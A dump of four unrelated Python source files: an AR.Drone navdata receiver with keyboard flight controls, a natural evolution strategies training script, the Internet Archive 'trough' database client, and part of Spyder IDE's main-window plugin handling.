if dataset[0]==65535 and choice[28]: navdata["chksum"] = decode_Footer(packet[offsetND:],packet)
offsetND += dataset[1]
return(navdata)
###############################=-
### Threads ###=-
###############################=-
def reconnect(navdata_pipe, commitsuicideND, DroneIP,NavDataPort):
if not commitsuicideND: navdata_pipe.sendto("\x01\x00\x00\x00", (DroneIP, NavDataPort))
def watchdogND(parentPID):
global commitsuicideND
while not commitsuicideND:
time.sleep(1)
try : os.getpgid(parentPID)
except: commitsuicideND=True
# It seems that you only have to reinitialize the network connection once; after that the drone keeps on sending forever.
def mainloopND(DroneIP,NavDataPort,parent_pipe,parentPID):
global commitsuicideND
something2send, MinimalPacketLength, timetag = False, 30, 0
packetlist = ["demo","time","raw_measures","phys_measures","gyros_offsets","euler_angles","references","trims","rc_references","pwm","altitude","vision_raw","vision_of","vision","vision_perf","trackers_send","vision_detect","watchdog","adc_data_frame","video_stream","games","pressure_raw","magneto","wind_speed","kalman_pressure","hdvideo_stream","wifi","zimmu_3000","chksum","state"]
choice = [False,False,False,False,False,False,False,False,False,False,False,False,False,False,False,False,False,False,False,False,False,False,False,False,False,False,False,False,False,True]
	overallchoice = False			# This and oneTimeFailOver are necessary because of a bug (?) in the AR.Drone sending NavData in DemoMode...
	oneTimeFailOver = True			# ...while setting a configuration, the drone sends the next DemoMode-package with just its status.
debug = False
showCommands = False
	# Watchdog-thread: checks whether the main process (identified by its PID) is still running
ThreadWatchdogND = threading.Thread(target=watchdogND,args=[parentPID])
ThreadWatchdogND.start()
# Prepare communication-pipes
pipes = []
pipes.append(parent_pipe)
navdata_pipe = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
navdata_pipe.setblocking(0)
navdata_pipe.bind(('', NavDataPort))
pipes.append(navdata_pipe)
# start connection
reconnect(navdata_pipe, commitsuicideND, DroneIP, NavDataPort)
netHeartbeat = threading.Timer(2.0, reconnect, [navdata_pipe,commitsuicideND,DroneIP,NavDataPort,]) # Inits the first Network-Heartbeat (2 secs after disconnection the drone stops sending)
netHeartbeat.start()
if choice.count(True) > 0: overallchoice = True
while not commitsuicideND:
in_pipe, out_pipe, dummy2 = select.select(pipes, [], [], 0.5) # When something is in a pipe...
for ip in in_pipe:
if ip == parent_pipe:
cmd = parent_pipe.recv()
if showCommands: print "** Com -> Nav : ",cmd
# Signal to stop this process and all its threads
if cmd == "die!": commitsuicideND = True
# Enables/disables Debug-bit
elif cmd == "debug":
debug = True
print "NavData-Process : running"
elif cmd == "undebug":
debug = False
				# Enables/disables showing of received commands
elif cmd == "showCommands": showCommands = True
elif cmd == "hideCommands": showCommands = False
elif cmd == "reconnect": reconnect(navdata_pipe, commitsuicideND, DroneIP, NavDataPort)
# Sets explicitly the value-packages which shall be decoded
elif cmd[0] == "send":
if cmd[1].count("all"):
for i in range (0,len(choice),1): choice[i] = True
else:
for i in range (0,len(packetlist),1):
if cmd[1].count(packetlist[i]): choice[i] = True
else: choice[i] = False
if choice.count(True) > 0: overallchoice = True
else: overallchoice = False
# Adds value-packages to the other which shall be decoded
elif cmd[0] == "add":
for i in range (0,len(packetlist),1):
if cmd[1].count(packetlist[i]): choice[i] = True
if cmd[1].count("all"):
for i in range (0,len(choice),1): choice[i] = True
if choice.count(True)>0: overallchoice = True
else: overallchoice = False
# Deletes packages from the value-package-list which shall not be decoded anymore
elif cmd[0] == "block":
if cmd[1].count("all"):
for i in range (0,len(packetlist),1): choice[i] = False
else:
for i in range (0,len(packetlist),1):
							if cmd[1].count(packetlist[i]):	choice[i] = False
if choice.count(True) > 0: overallchoice = True
else: overallchoice = False
if ip == navdata_pipe:
try:
netHeartbeat.cancel() # Connection is alive, Network-Heartbeat not necessary for a moment
Packet = navdata_pipe.recv(65535) # Receiving raw NavData-Package
netHeartbeat = threading.Timer(2.1,reconnect,[navdata_pipe,commitsuicideND,DroneIP,NavDataPort])
netHeartbeat.start() # Network-Heartbeat is set here, because the drone keeps on sending NavData (vid, etc you have to switch on)
timestamp = timetag # Setting up decoding-time calculation
timetag = time.time()
if overallchoice:
try: lastdecodedNavData=decodedNavData
except: lastdecodedNavData={}
decodedNavData = getNavdata(Packet,choice)
state = decodedNavData["state"]
					# If there is an abnormally small NavPacket, the last NavPacket will be sent out with an error-tag
NoNavData = False
if len(Packet)<MinimalPacketLength and overallchoice: decodedNavData, NoNavData = lastdecodedNavData, True
dectime = time.time()-timetag
# Sends all the data to the mainprocess
parent_pipe.send((decodedNavData, state[0:32], state[32], timestamp, dectime, NoNavData))
except IOError: pass
suicideND = True
netHeartbeat.cancel()
if debug: print "NavData-Process : committed suicide"
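# Usage note (illustrative, not part of the original code): the main process drives
# mainloopND() through the other end of parent_pipe, either with plain strings
# ("die!", "debug", "undebug", "reconnect", ...) or with ("send"/"add"/"block", [list])
# tuples that select which option packages get decoded, e.g. (pipe name assumed):
#	pipe_to_navdata.send(("send", ["demo", "time"]))	# decode only these packages
#	pipe_to_navdata.send(("add", ["altitude"]))		# additionally decode altitude
#	pipe_to_navdata.send(("block", ["all"]))		# stop decoding everything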
##################################################################################################
###### Playground ######
##################################################################################################
if __name__ == "__main__":
###
### Here you can write your first test-codes and play around with them
###
import time
import ps_drone
drone = ps_drone.Drone() # Start using drone
drone.startup() # Connects to drone and starts subprocesses
drone.reset() # Always good, at start
while drone.getBattery()[0] == -1: time.sleep(0.1) # Waits until the drone has done its reset
time.sleep(0.5) # Give it some time to fully awake
print "Battery: "+str(drone.getBattery()[0])+"% "+str(drone.getBattery()[1]) # Gives a battery-status
stop = False
while not stop:
key = drone.getKey()
if key == " ":
if drone.NavData["demo"][0][2] and not drone.NavData["demo"][0][3]: drone.takeoff()
else: drone.land()
elif key == "0": drone.hover()
elif key == "w": drone.moveForward()
elif key == "s": drone.moveBackward()
elif key == "a": drone.moveLeft()
elif key == "d": drone.moveRight()
elif key == "q": drone.turnLeft()
elif key == "e": drone.turnRight()
elif key == "7": drone.turnAngle(-10,1)
elif key == "9": drone.turnAngle( 10,1)
elif key == "4": drone.turnAngle(-45,1)
elif key == "6": drone.turnAngle( 45,1)
elif key == "1": drone.turnAngle(-90,1)
elif key == "3": drone.turnAngle( 90,1)
elif key == "8": drone.moveUp()
elif key == "2": drone.moveDown()
elif key == "*": drone.doggyHop()
elif key == "+": drone.doggyNod()
elif key == "-": drone.doggyWag()
elif key != "": stop = True
print "Batterie: "+str(drone.getBattery()[0])+"% "+str(drone.getBattery()[1]) # Gives a battery-status
|
natural_es.py
|
import torch
import torch.multiprocessing as mp
from torch.multiprocessing import SimpleQueue
import numpy as np
from utils import *
import pickle
from config import *
import time
import logging  # used by multi_runs() below for the FileHandler / DEBUG level
class Worker(mp.Process):
def __init__(self, id, param, state_normalizer, task_q, result_q, stop, config):
mp.Process.__init__(self)
self.id = id
self.task_q = task_q
self.param = param
self.result_q = result_q
self.stop = stop
self.config = config
self.evaluator = Evaluator(config, state_normalizer)
def run(self):
config = self.config
np.random.seed()
while not self.stop.value:
if self.task_q.empty():
continue
self.task_q.get()
disturbed_param = np.copy(self.param.numpy().flatten())
epsilon = np.random.randn(len(disturbed_param))
disturbed_param += config.sigma * epsilon
fitness, steps = self.evaluator.eval(disturbed_param)
self.result_q.put([epsilon, -fitness, steps])
def train(config):
task_queue = SimpleQueue()
result_queue = SimpleQueue()
stop = mp.Value('i', False)
stats = SharedStats(config.state_dim)
param = torch.FloatTensor(torch.from_numpy(config.initial_weight))
param.share_memory_()
normalizers = [StaticNormalizer(config.state_dim) for _ in range(config.num_workers)]
for normalizer in normalizers:
normalizer.offline_stats.load(stats)
workers = [Worker(id, param, normalizers[id], task_queue, result_queue, stop, config) for id in range(config.num_workers)]
for w in workers: w.start()
training_rewards = []
training_steps = []
training_timestamps = []
initial_time = time.time()
total_steps = 0
iteration = 0
while not stop.value:
test_mean, test_ste = test(config, param.numpy(), stats)
elapsed_time = time.time() - initial_time
training_rewards.append(test_mean)
training_steps.append(total_steps)
training_timestamps.append(elapsed_time)
logger.info('Test: total steps %d, %f(%f), elapsed time %d' %
(total_steps, test_mean, test_ste, elapsed_time))
for i in range(config.pop_size):
task_queue.put(i)
rewards = []
epsilons = []
steps = []
while len(rewards) < config.pop_size:
if result_queue.empty():
continue
epsilon, fitness, step = result_queue.get()
epsilons.append(epsilon)
rewards.append(fitness)
steps.append(step)
total_steps += np.sum(steps)
r_mean = np.mean(rewards)
r_std = np.std(rewards)
# rewards = (rewards - r_mean) / r_std
logger.info('Train: iteration %d, %f(%f)' % (iteration, r_mean, r_std / np.sqrt(config.pop_size)))
iteration += 1
# if r_mean > config.target:
if config.max_steps and total_steps > config.max_steps:
stop.value = True
break
for normalizer in normalizers:
stats.merge(normalizer.online_stats)
normalizer.online_stats.zero()
for normalizer in normalizers:
normalizer.offline_stats.load(stats)
rewards = fitness_shift(rewards)
gradient = np.asarray(epsilons) * np.asarray(rewards).reshape((-1, 1))
gradient = np.mean(gradient, 0) / config.sigma
gradient -= config.weight_decay * gradient
gradient = config.opt.update(gradient)
gradient = torch.FloatTensor(gradient)
param.add_(config.learning_rate * gradient)
for w in workers: w.join()
return [training_rewards, training_steps, training_timestamps]
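# The gradient step above relies on fitness_shift() from utils, which is not shown in
# this file. A common choice (an assumption here, not necessarily the exact
# implementation) is centered-rank fitness shaping: replace the raw returns by their
# ranks scaled into [-0.5, 0.5] before forming the NES estimate
# g ~ 1/(N*sigma) * sum_i F_i * eps_i.
def _example_centered_ranks(rewards):
    rewards = np.asarray(rewards)
    ranks = np.empty(len(rewards), dtype=np.float64)
    ranks[rewards.argsort()] = np.arange(len(rewards))  # 0 = worst, N-1 = best
    return ranks / (len(rewards) - 1) - 0.5             # centered into [-0.5, 0.5]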
def test(config, solution, stats):
normalizer = StaticNormalizer(config.state_dim)
normalizer.offline_stats.load_state_dict(stats.state_dict())
evaluator = Evaluator(config, normalizer)
evaluator.model.set_weight(solution)
rewards = []
for i in range(config.test_repetitions):
reward, _ = evaluator.single_run()
rewards.append(reward)
return np.mean(rewards), np.std(rewards) / config.test_repetitions
def multi_runs(config):
fh = logging.FileHandler('log/%s-%s.txt' % (config.tag, config.task))
fh.setLevel(logging.DEBUG)
logger.addHandler(fh)
stats = []
runs = 10
for run in range(runs):
logger.info('Run %d' % (run))
stats.append(train(config))
with open('data/%s-stats-%s.bin' % (config.tag, config.task), 'wb') as f:
pickle.dump(stats, f)
def all_tasks():
configs = []
hidden_size = 64
# config = PendulumConfig(hidden_size)
# configs.append(config)
# config = ContinuousLunarLanderConfig(hidden_size)
# configs.append(config)
config = BipedalWalkerConfig(hidden_size)
configs.append(config)
config = BipedalWalkerHardcore(hidden_size)
configs.append(config)
ps = []
for cf in configs:
cf.num_workers = 8
cf.pop_size = 64
cf.sigma = 0.1
cf.learning_rate = 0.1
# cf.action_noise_std = 0.02
cf.max_steps = int(1e7)
cf.tag = 'NES-%d' % (cf.hidden_size)
ps.append(mp.Process(target=multi_runs, args=(cf, )))
for p in ps: p.start()
for p in ps: p.join()
if __name__ == '__main__':
all_tasks()
|
client.py
|
'''
trough/client.py - trough client code
Copyright (C) 2017-2019 Internet Archive
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301,
USA.
'''
from __future__ import absolute_import
import logging
import os
import json
import requests
import doublethink
import rethinkdb as r
import datetime
import threading
import time
import collections
from aiohttp import ClientSession
class TroughException(Exception):
def __init__(self, message, payload=None, returned_message=None):
super().__init__(message)
self.payload = payload
self.returned_message = returned_message
class TroughSegmentNotFound(TroughException):
pass
class TroughClient(object):
logger = logging.getLogger('trough.client.TroughClient')
def __init__(self, rethinkdb_trough_db_url, promotion_interval=None):
'''
TroughClient constructor
Args:
rethinkdb_trough_db_url: url with schema rethinkdb:// pointing to
trough configuration database
promotion_interval: if specified, `TroughClient` will spawn a
thread that "promotes" (pushed to hdfs) "dirty" trough segments
(segments that have received writes) periodically, sleeping for
`promotion_interval` seconds between cycles (default None)
'''
parsed = doublethink.parse_rethinkdb_url(rethinkdb_trough_db_url)
self.rr = doublethink.Rethinker(
servers=parsed.hosts, db=parsed.database)
self.svcreg = doublethink.ServiceRegistry(self.rr)
self._write_url_cache = {}
self._read_url_cache = {}
self._dirty_segments = set()
self._dirty_segments_lock = threading.RLock()
self.promotion_interval = promotion_interval
self._promoter_thread = None
if promotion_interval:
self._promoter_thread = threading.Thread(
target=self._promotrix, name='TroughClient-promoter')
self._promoter_thread.setDaemon(True)
self._promoter_thread.start()
def _promotrix(self):
while True:
time.sleep(self.promotion_interval)
try:
with self._dirty_segments_lock:
dirty_segments = list(self._dirty_segments)
self._dirty_segments.clear()
self.logger.info(
'promoting %s trough segments', len(dirty_segments))
for segment_id in dirty_segments:
try:
self.promote(segment_id)
except:
self.logger.error(
'problem promoting segment %s', segment_id,
exc_info=True)
except:
self.logger.error(
'caught exception doing segment promotion',
exc_info=True)
def promote(self, segment_id):
url = os.path.join(self.segment_manager_url(), 'promote')
payload_dict = {'segment': segment_id}
self.logger.debug('posting %s to %s', json.dumps(payload_dict), url)
response = requests.post(url, json=payload_dict, timeout=21600)
if response.status_code != 200:
raise TroughException(
'unexpected response %r %r: %r from POST %r with '
'payload %r' % (
response.status_code, response.reason, response.text,
url, json.dumps(payload_dict)))
@staticmethod
def sql_value(x):
if x is None:
return 'null'
elif isinstance(x, datetime.datetime):
return 'datetime(%r)' % x.isoformat()
elif isinstance(x, bool):
return int(x)
elif isinstance(x, str) or isinstance(x, bytes):
            # the only character that needs to be escaped in sqlite string literals
# is single-quote, which is escaped as two single-quotes
if isinstance(x, bytes):
s = x.decode('utf-8')
else:
s = x
return "'" + s.replace("'", "''") + "'"
elif isinstance(x, (int, float)):
return x
else:
raise TroughException(
"don't know how to make an sql value from %r (%r)" % (
x, type(x)))
def segment_manager_url(self):
master_node = self.svcreg.unique_service('trough-sync-master')
if not master_node:
raise TroughException(
'no healthy trough-sync-master in service registry')
return master_node['url']
def write_url_nocache(self, segment_id, schema_id='default'):
url = os.path.join(self.segment_manager_url(), 'provision')
payload_dict = {'segment': segment_id, 'schema': schema_id}
self.logger.debug('posting %s to %s', json.dumps(payload_dict), url)
response = requests.post(url, json=payload_dict, timeout=600)
if response.status_code != 200:
raise TroughException(
'unexpected response %r %r: %r from POST %r with '
'payload %r' % (
response.status_code, response.reason, response.text,
url, json.dumps(payload_dict)))
result_dict = response.json()
# assert result_dict['schema'] == schema_id # previously provisioned?
return result_dict['write_url']
def read_url_nocache(self, segment_id):
reql = self.rr.table('services', read_mode='outdated').get_all(
segment_id, index='segment').filter(
{'role':'trough-read'}).filter(
lambda svc: r.now().sub(
svc['last_heartbeat']).lt(svc['ttl'])
).order_by('load')
self.logger.debug('querying rethinkdb: %r', reql)
results = reql.run()
try:
return results[0]['url']
except:
raise TroughSegmentNotFound(
'no read url for segment %s; usually this means the '
"segment hasn't been provisioned yet" % segment_id)
def read_urls_for_regex(self, regex):
'''
Looks up read urls for segments matching `regex`.
Populates `self._read_url_cache` and returns dictionary
`{segment: url}`
'''
d = {}
reql = self.rr.table('services', read_mode='outdated')\
.filter({'role': 'trough-read'})\
.filter(r.row.has_fields('segment'))\
.filter(lambda svc: svc['segment'].coerce_to('string').match(regex))\
.filter(lambda svc: r.now().sub(svc['last_heartbeat']).lt(svc['ttl']))
self.logger.debug('querying rethinkdb: %r', reql)
results = reql.run()
for result in results:
d[result['segment']] = result['url']
self._read_url_cache[result['segment']] = result['url']
return d
def schemas(self):
reql = self.rr.table('schema', read_mode='outdated')
for result in reql.run():
yield collections.OrderedDict([('name', result['id'])])
def schema(self, id):
reql = self.rr.table('schema', read_mode='outdated').get(id)
result = reql.run()
if result:
return [collections.OrderedDict([(id, result['sql'])])]
else:
return None
def readable_segments(self, regex=None):
reql = self.rr.table('services', read_mode='outdated')\
.filter({'role':'trough-read'})\
.filter(lambda svc: r.now().sub(svc['last_heartbeat'])\
.lt(svc['ttl']))
if regex:
reql = reql.filter(
lambda svc: svc['segment'].coerce_to('string').match(regex))
self.logger.debug('querying rethinkdb: %r', reql)
results = reql.run()
        for result in results:
yield collections.OrderedDict([
('segment', result['segment']),
('url', result['url']),
('first_heartbeat', result['first_heartbeat']),
('last_heartbeat', result['last_heartbeat'])])
def write_url(self, segment_id, schema_id='default'):
if not segment_id in self._write_url_cache:
self._write_url_cache[segment_id] = self.write_url_nocache(
segment_id, schema_id)
self.logger.info(
'segment %r write url is %r', segment_id,
self._write_url_cache[segment_id])
return self._write_url_cache[segment_id]
def read_url(self, segment_id):
if not self._read_url_cache.get(segment_id):
self._read_url_cache[segment_id] = self.read_url_nocache(segment_id)
self.logger.info(
'segment %r read url is %r', segment_id,
self._read_url_cache[segment_id])
return self._read_url_cache[segment_id]
def write(self, segment_id, sql_tmpl, values=(), schema_id='default'):
write_url = self.write_url(segment_id, schema_id)
sql = sql_tmpl % tuple(self.sql_value(v) for v in values)
sql_bytes = sql.encode('utf-8')
try:
response = requests.post(
write_url, sql_bytes, timeout=600,
headers={'content-type': 'application/sql;charset=utf-8'})
if response.status_code != 200:
raise TroughException(
'unexpected response %r %r: %r from POST %r with '
'payload %r' % (
response.status_code, response.reason,
response.text, write_url, sql_bytes), sql_bytes, response.text)
if segment_id not in self._dirty_segments:
with self._dirty_segments_lock:
self._dirty_segments.add(segment_id)
except Exception as e:
self._write_url_cache.pop(segment_id, None)
raise e
def read(self, segment_id, sql_tmpl, values=()):
read_url = self.read_url(segment_id)
sql = sql_tmpl % tuple(self.sql_value(v) for v in values)
sql_bytes = sql.encode('utf-8')
try:
response = requests.post(
read_url, sql_bytes, timeout=600,
headers={'content-type': 'application/sql;charset=utf-8'})
if response.status_code != 200:
raise TroughException(
'unexpected response %r %r %r from %r to query %r' % (
response.status_code, response.reason, response.text,
read_url, sql_bytes), sql_bytes, response.text)
self.logger.trace(
'got %r from posting query %r to %r', response.text, sql,
read_url)
results = json.loads(response.text)
return results
except Exception as e:
self._read_url_cache.pop(segment_id, None)
raise e
async def async_read(self, segment_id, sql_tmpl, values=()):
read_url = self.read_url(segment_id)
sql = sql_tmpl % tuple(self.sql_value(v) for v in values)
sql_bytes = sql.encode('utf-8')
async with ClientSession() as session:
async with session.post(
read_url, data=sql_bytes, headers={
'content-type': 'application/sql;charset=utf-8'}) as res:
if res.status != 200:
self._read_url_cache.pop(segment_id, None)
text = await res.text('utf-8')
raise TroughException(
'unexpected response %r %r %r from %r to '
'query %r' % (
res.status, res.reason, text, read_url,
sql), sql_bytes, text)
results = list(await res.json())
return results
def schema_exists(self, schema_id):
url = os.path.join(self.segment_manager_url(), 'schema', schema_id)
response = requests.get(url, timeout=60)
if response.status_code == 200:
return True
elif response.status_code == 404:
return False
else:
try:
response.raise_for_status()
except Exception as e:
raise TroughException(e)
def register_schema(self, schema_id, sql):
url = os.path.join(
self.segment_manager_url(), 'schema', schema_id, 'sql')
response = requests.put(url, sql, timeout=600)
if response.status_code not in (201, 204):
raise TroughException(
'unexpected response %r %r %r from %r to query %r' % (
response.status_code, response.reason, response.text,
url, sql))
def delete_segment(self, segment_id):
url = os.path.join(self.segment_manager_url(), 'segment', segment_id)
self.logger.debug('DELETE %s', url)
response = requests.delete(url, timeout=1200)
if response.status_code == 404:
raise TroughSegmentNotFound('received 404 from DELETE %s' % url)
elif response.status_code != 204:
raise TroughException(
'unexpected response %r %r: %r from DELETE %s' % (
response.status_code, response.reason, response.text,
url))
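# Example usage sketch (not part of the original module; the RethinkDB URL, segment id
# and schema below are made-up placeholders). It shows the intended round trip:
# provision a schema, write rows into a segment, then read them back.
def _example_usage():
    client = TroughClient(
            'rethinkdb://db0,db1,db2/trough_configuration', promotion_interval=300)
    if not client.schema_exists('example'):
        client.register_schema(
                'example', 'create table test (id integer, val varchar(100));')
    client.write(
            'segment-000001', 'insert into test (id, val) values (%s, %s);',
            (1, 'hello'), schema_id='example')
    return client.read(
            'segment-000001', 'select * from test where id = %s;', (1,))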
|
mainwindow.py
|
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""
Spyder, the Scientific Python Development Environment
=====================================================
Developed and maintained by the Spyder Project
Contributors
Copyright © Spyder Project Contributors
Licensed under the terms of the MIT License
(see spyder/__init__.py for details)
"""
# =============================================================================
# Stdlib imports
# =============================================================================
from collections import OrderedDict
from enum import Enum
import errno
import gc
import logging
import os
import os.path as osp
import shutil
import signal
import socket
import sys
import threading
import traceback
#==============================================================================
# Check requirements before proceeding
#==============================================================================
from spyder import requirements
requirements.check_path()
requirements.check_qt()
#==============================================================================
# Third-party imports
#==============================================================================
from qtpy.compat import from_qvariant
from qtpy.QtCore import (QCoreApplication, Qt, QTimer, Signal, Slot,
qInstallMessageHandler)
from qtpy.QtGui import QColor, QKeySequence
from qtpy.QtWidgets import (QApplication, QMainWindow, QMenu, QMessageBox,
QShortcut, QStyleFactory)
# Avoid a "Cannot mix incompatible Qt library" error on Windows platforms
from qtpy import QtSvg # analysis:ignore
# Avoid a bug in Qt: https://bugreports.qt.io/browse/QTBUG-46720
from qtpy import QtWebEngineWidgets # analysis:ignore
from qtawesome.iconic_font import FontError
#==============================================================================
# Local imports
# NOTE: Move (if possible) imports of widgets and plugins exactly where they
# are needed in MainWindow to speed up perceived startup time (i.e. the time
# from clicking the Spyder icon to showing the splash screen).
#==============================================================================
from spyder import __version__
from spyder import dependencies
from spyder.app.find_plugins import (
find_external_plugins, find_internal_plugins)
from spyder.app.utils import (
create_application, create_splash_screen, create_window, ORIGINAL_SYS_EXIT,
delete_debug_log_files, qt_message_handler, set_links_color, setup_logging,
set_opengl_implementation)
from spyder.api.plugin_registration.registry import PLUGIN_REGISTRY
from spyder.config.base import (_, DEV, get_conf_path, get_debug_level,
get_home_dir, get_module_source_path,
is_pynsist, running_in_mac_app,
running_under_pytest, STDERR)
from spyder.config.gui import is_dark_font_color
from spyder.config.main import OPEN_FILES_PORT
from spyder.config.manager import CONF
from spyder.config.utils import IMPORT_EXT, is_gtk_desktop
from spyder.otherplugins import get_spyderplugins_mods
from spyder.py3compat import configparser as cp, PY3, to_text_string
from spyder.utils import encoding, programs
from spyder.utils.icon_manager import ima
from spyder.utils.misc import (select_port, getcwd_or_home,
get_python_executable)
from spyder.utils.palette import QStylePalette
from spyder.utils.qthelpers import (create_action, add_actions, file_uri,
qapplication, start_file)
from spyder.utils.stylesheet import APP_STYLESHEET
# Spyder API Imports
from spyder.api.exceptions import SpyderAPIError
from spyder.api.plugins import (
Plugins, SpyderPlugin, SpyderPluginV2, SpyderDockablePlugin,
SpyderPluginWidget)
#==============================================================================
# Windows only local imports
#==============================================================================
set_attached_console_visible = None
is_attached_console_visible = None
set_windows_appusermodelid = None
if os.name == 'nt':
from spyder.utils.windows import (set_attached_console_visible,
set_windows_appusermodelid)
#==============================================================================
# Constants
#==============================================================================
# Module logger
logger = logging.getLogger(__name__)
#==============================================================================
# Install Qt message handler
#==============================================================================
qInstallMessageHandler(qt_message_handler)
#==============================================================================
# Main Window
#==============================================================================
class MainWindow(QMainWindow):
"""Spyder main window"""
DOCKOPTIONS = (
QMainWindow.AllowTabbedDocks | QMainWindow.AllowNestedDocks |
QMainWindow.AnimatedDocks
)
SPYDER_PATH = get_conf_path('path')
SPYDER_NOT_ACTIVE_PATH = get_conf_path('not_active_path')
DEFAULT_LAYOUTS = 4
INITIAL_CWD = getcwd_or_home()
# Signals
restore_scrollbar_position = Signal()
sig_setup_finished = Signal()
all_actions_defined = Signal()
# type: (OrderedDict, OrderedDict)
sig_pythonpath_changed = Signal(object, object)
sig_open_external_file = Signal(str)
sig_resized = Signal("QResizeEvent")
sig_moved = Signal("QMoveEvent")
sig_layout_setup_ready = Signal(object) # Related to default layouts
# ---- Plugin handling methods
# ------------------------------------------------------------------------
def get_plugin(self, plugin_name, error=True):
"""
Return a plugin instance by providing the plugin class.
"""
if plugin_name in PLUGIN_REGISTRY:
return PLUGIN_REGISTRY.get_plugin(plugin_name)
if error:
raise SpyderAPIError(f'Plugin "{plugin_name}" not found!')
return None
def get_dockable_plugins(self):
"""Get a list of all dockable plugins."""
dockable_plugins = []
for plugin_name in PLUGIN_REGISTRY:
plugin = PLUGIN_REGISTRY.get_plugin(plugin_name)
if isinstance(plugin, (SpyderDockablePlugin, SpyderPluginWidget)):
dockable_plugins.append((plugin_name, plugin))
return dockable_plugins
def is_plugin_enabled(self, plugin_name):
"""Determine if a given plugin is going to be loaded."""
return PLUGIN_REGISTRY.is_plugin_enabled(plugin_name)
def is_plugin_available(self, plugin_name):
"""Determine if a given plugin is available."""
return PLUGIN_REGISTRY.is_plugin_available(plugin_name)
def show_status_message(self, message, timeout):
"""
Show a status message in Spyder Main Window.
"""
status_bar = self.statusBar()
if status_bar.isVisible():
status_bar.showMessage(message, timeout)
def show_plugin_compatibility_message(self, message):
"""
Show a compatibility message.
"""
messageBox = QMessageBox(self)
messageBox.setWindowModality(Qt.NonModal)
messageBox.setAttribute(Qt.WA_DeleteOnClose)
messageBox.setWindowTitle(_('Compatibility Check'))
messageBox.setText(message)
messageBox.setStandardButtons(QMessageBox.Ok)
messageBox.show()
def register_plugin(self, plugin_name, external=False, omit_conf=False):
"""
Register a plugin in Spyder Main Window.
"""
plugin = PLUGIN_REGISTRY.get_plugin(plugin_name)
self.set_splash(_("Loading {}...").format(plugin.get_name()))
logger.info("Loading {}...".format(plugin.NAME))
# Check plugin compatibility
is_compatible, message = plugin.check_compatibility()
plugin.is_compatible = is_compatible
plugin.get_description()
if not is_compatible:
            self.show_plugin_compatibility_message(message)
return
# Connect Plugin Signals to main window methods
plugin.sig_exception_occurred.connect(self.handle_exception)
plugin.sig_free_memory_requested.connect(self.free_memory)
plugin.sig_quit_requested.connect(self.close)
plugin.sig_redirect_stdio_requested.connect(
self.redirect_internalshell_stdio)
plugin.sig_status_message_requested.connect(self.show_status_message)
if isinstance(plugin, SpyderDockablePlugin):
plugin.sig_focus_changed.connect(self.plugin_focus_changed)
plugin.sig_switch_to_plugin_requested.connect(
self.switch_to_plugin)
plugin.sig_update_ancestor_requested.connect(
lambda: plugin.set_ancestor(self))
# Connect Main window Signals to plugin signals
self.sig_moved.connect(plugin.sig_mainwindow_moved)
self.sig_resized.connect(plugin.sig_mainwindow_resized)
# Register plugin
plugin._register(omit_conf=omit_conf)
if isinstance(plugin, SpyderDockablePlugin):
# Add dockwidget
self.add_dockwidget(plugin)
# Update margins
margin = 0
if CONF.get('main', 'use_custom_margin'):
margin = CONF.get('main', 'custom_margin')
plugin.update_margins(margin)
if plugin_name == Plugins.Shortcuts:
for action, context, action_name in self.shortcut_queue:
self.register_shortcut(action, context, action_name)
self.shortcut_queue = []
logger.info("Registering shortcuts for {}...".format(plugin.NAME))
for action_name, action in plugin.get_actions().items():
context = (getattr(action, 'shortcut_context', plugin.NAME)
or plugin.NAME)
if getattr(action, 'register_shortcut', True):
if isinstance(action_name, Enum):
action_name = action_name.value
if Plugins.Shortcuts in PLUGIN_REGISTRY:
self.register_shortcut(action, context, action_name)
else:
self.shortcut_queue.append((action, context, action_name))
if isinstance(plugin, SpyderDockablePlugin):
try:
context = '_'
name = 'switch to {}'.format(plugin.CONF_SECTION)
shortcut = CONF.get_shortcut(context, name,
plugin_name=plugin.CONF_SECTION)
except (cp.NoSectionError, cp.NoOptionError):
shortcut = None
sc = QShortcut(QKeySequence(), self,
lambda: self.switch_to_plugin(plugin))
sc.setContext(Qt.ApplicationShortcut)
plugin._shortcut = sc
if Plugins.Shortcuts in PLUGIN_REGISTRY:
self.register_shortcut(sc, context, name)
self.register_shortcut(
plugin.toggle_view_action, context, name)
else:
self.shortcut_queue.append((sc, context, name))
self.shortcut_queue.append(
(plugin.toggle_view_action, context, name))
def unregister_plugin(self, plugin):
"""
Unregister a plugin from the Spyder Main Window.
"""
logger.info("Unloading {}...".format(plugin.NAME))
# Disconnect all slots
signals = [
plugin.sig_quit_requested,
plugin.sig_redirect_stdio_requested,
plugin.sig_status_message_requested,
]
for sig in signals:
try:
sig.disconnect()
except TypeError:
pass
# Unregister shortcuts for actions
logger.info("Unregistering shortcuts for {}...".format(plugin.NAME))
for action_name, action in plugin.get_actions().items():
context = (getattr(action, 'shortcut_context', plugin.NAME)
or plugin.NAME)
self.shortcuts.unregister_shortcut(action, context, action_name)
# Unregister switch to shortcut
shortcut = None
try:
context = '_'
name = 'switch to {}'.format(plugin.CONF_SECTION)
shortcut = CONF.get_shortcut(context, name,
plugin_name=plugin.CONF_SECTION)
except Exception:
pass
if shortcut is not None:
self.shortcuts.unregister_shortcut(
plugin._shortcut,
context,
"Switch to {}".format(plugin.CONF_SECTION),
)
# Remove dockwidget
logger.info("Removing {} dockwidget...".format(plugin.NAME))
self.remove_dockwidget(plugin)
plugin._unregister()
def create_plugin_conf_widget(self, plugin):
"""
Create configuration dialog box page widget.
"""
config_dialog = self.prefs_dialog_instance
if plugin.CONF_WIDGET_CLASS is not None and config_dialog is not None:
conf_widget = plugin.CONF_WIDGET_CLASS(plugin, config_dialog)
conf_widget.initialize()
return conf_widget
@property
def last_plugin(self):
"""
Get last plugin with focus if it is a dockable widget.
If a non-dockable plugin has the focus this will return by default
the Editor plugin.
"""
# Needed to prevent errors with the old API at
# spyder/plugins/base::_switch_to_plugin
return self.layouts.get_last_plugin()
def maximize_dockwidget(self, restore=False):
"""
This is needed to prevent errors with the old API at
